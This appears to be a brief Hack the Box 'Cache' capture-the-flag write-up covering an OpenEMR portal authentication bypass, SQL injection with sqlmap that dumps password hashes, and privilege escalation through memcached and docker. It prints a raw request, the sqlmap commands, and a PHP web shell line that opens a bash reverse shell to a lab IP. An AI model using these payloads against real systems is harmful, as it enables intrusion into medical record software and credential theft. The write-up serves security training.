Hack the Box: Cache

Cache

User

Nmap scan
Main site
login page
Credentials in js file
net.html
OpenEMR login page
OpenEMR version
An unauthenticated user is able to bypass the Patient Portal Login by simply navigating tothe registration page and modifying the requested url to access the desired page.
# cat request 
GET /portal/find_appt_popup_user.php?catid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=hr2livsbd5ai8c5cmglpme60fi; PHPSESSID=47et9rbfja72qos57se81ea8ha
Upgrade-Insecure-Requests: 1
# sqlmap -r request --tables -v0
--snip--
| users_facility |
| users_secure |
# sqlmap -r request --dump -T users_secure
password hash to openmr_admin
reversing the password
Admin interface
Wesbshell
Listable /sites
echo "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.18/443 0>&1'\"); ?>" > /var/www/hms.htb/public_html/sites/tellico.php
Reverse shell
User flag

Root

Netstat result
Listing content of memcached
Reading luffy credentials
Move to luffy
Listing local docker images
Root flagcd

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store